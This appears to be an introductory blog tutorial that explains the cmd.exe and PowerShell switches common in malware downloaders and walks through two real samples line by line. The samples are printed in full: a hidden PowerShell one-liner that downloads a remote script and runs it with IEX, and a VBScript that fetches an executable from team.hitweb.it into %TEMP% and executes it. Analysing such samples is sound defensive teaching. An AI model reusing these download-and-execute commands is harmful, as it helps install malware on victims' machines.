This
is an entry level view to understand scripting used by downloaders and
by other malware. I assume no previous knowledge of scripting and the
goal is to make the reader familiar with this topic. First I introduce
scripting engines (shells) commonly used by downloaders. At the end I
provide a few step-through of selected samples.
Commands and command line
switches found in malware
First a few words about notation:
· * DOS
commands may use either forward slash (/) or hyphen (-) as a switch character,
so cmd.exe /c and cmd.exe -c are the same commands. Powershell uses only hyphen
(-)
· *
commands
are written in lowercase, if possible. In the real samples, it is common that
they are written in mixed case for example: C:\WiNDOws\sYStEm32\CMD.EXE /C. In
general the scripting languages are case-insensitive
· *
Powershell
has a "standard form" for commands for example Invoke-Command which
may be written as invoke-command in this document
· *
as
a rule of thumb DOS and Vbscript use double-quotes with strings and Powershell
uses single-quotes. There are however exceptions for this rule
DOS Commands
cmd.exe /c [string]
/c Carries
out the command specified by string and then terminates command shell.
start.exe /b [string] Starts a separate window to run a specified
program or command
/b Start
application without creating a new window
Powershell
About notation:
·
commands
and command switches are represented both with their shortest and full form for
example -w[indowstyle] means that the switch can be between -w and -windowstyle
and it may contain any number of characters from [indowstyle] part like -wind
powershell -noexit -nol -noninteractiv -noprofile
-execution bypass -windows hidden [string] |IEX
-noe[xit] Doesn't
exit after running commands
-nol[ogo] Hides
the copyright banner at startup
-noni[nteractive] Doesn't
present an interactive prompt to the user
-nop[rofile] Doesn't load
the PowerShell profile
-ex[ecutionpolicy] Sets
the default execution policy for the current session and saves it in the $env:PSExecutionPolicyPreference environment variable. Value bypass: nothing is
blocked and there are no warnings or prompts.
-w[indowstyle] Sets
the window style for the session. Value hidden: no window is shown
[string] A
command string or script block
IEX Invoke-Expression command
powershell.exe -nop -w hidden -c
[string]
-c[ommand] Executes the specified commands (with any parameters)
as though they were typed at the PowerShell command prompt.
powershell -nop -sta
-w 1 -enc [string]
-sta Starts
PowerShell using a single-threaded apartment. This is usually obsolete setting
to distract analysis
-e[ncodedcommand] Accepts a base-64-encoded string
as a command
-w 1 Same as
-windows hidden, now the value hidden is replaced with a numeric constant
A sample step-through
Here is
a very simple downloader sample which I found at Pastebin.
powershell.exe
-nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX
$l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');
For the
sake of clarity I have divided a single long string with linebreaks. I have
also added linenumbers.
1.
powershell.exe -nop -w hidden -c
2.
$l=new-object net.webclient;
3.
$l.proxy=[Net.WebRequest]::GetSystemWebProxy();
4.
$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
5. IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');
Steps:
1. Invoke Powershell with no
execution policy, hidden window and execute following commands
2. Create a WebClient object and
assign object to variable l
3. Assign proxy settings to variable
I's proxy property
4. Set proxy credentials
5. Invoke expression "I.downloadstring" which has string
parameter 'http://192.168.0.10:8080/E1Y8TdrQEfw'
Set usdbzw
= CreateObject("WScript.Shell")
usdbzw.Run
"powershell $gscbut = New-Object -ComObject Msxml2.XMLHTTP; $hgttbdy =
New-Object -ComObject ADODB.Stream; $zteyxhj = $env:temp +
'\Dropbo.exe';$gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);$gscbut.send();
if($gscbut.Status -eq "200"){$hgttbdy.open();$hgttbdy.type =
1;$hgttbdy.write($gscbut.responseBody);$hgttbdy.position =
0;$hgttbdy.savetofile($zteyxhj);$hgttbdy.close();} Start-Process
$zteyxhj;",0, true
Here is the
sample with linebreaks and linenumbers.
1. Set usdbzw =
CreateObject("WScript.Shell")
2. usdbzw.Run
3. "powershell
4. $gscbut = New-Object -ComObject
Msxml2.XMLHTTP;
5. $hgttbdy = New-Object -ComObject
ADODB.Stream;
6. $zteyxhj = $env:temp + '\Dropbo.exe';
7. $gscbut.open('GET',
'http://team.hitweb.it/tes2t?12143', $false);
8. $gscbut.send();
9. if($gscbut.Status -eq "200")
10. {$hgttbdy.open();
11. $hgttbdy.type = 1;
12. $hgttbdy.write($gscbut.responseBody);
13. $hgttbdy.position = 0;
14. $hgttbdy.savetofile($zteyxhj);
15. $hgttbdy.close();}
16. Start-Process $zteyxhj;"
17. ,0,
true
Steps:
1.-2. and
17. Create VBScipt shell object and execute string. Create no window and wait
the script to finish
3. The
string contains Powershell script
4. Create XMLHTTP
object
5. Create ADODB.Stream
object
6. Create a
temporary file %TEMP%\Dropbo.exe
7.-8. Open
HTTP connection
9. Check if
the connection was established
10.-15.
Read the HTTP response stream and write it to temporary file %TEMP%\Dropbo.exe
16. Execute
%TEMP%\Dropbo.exe
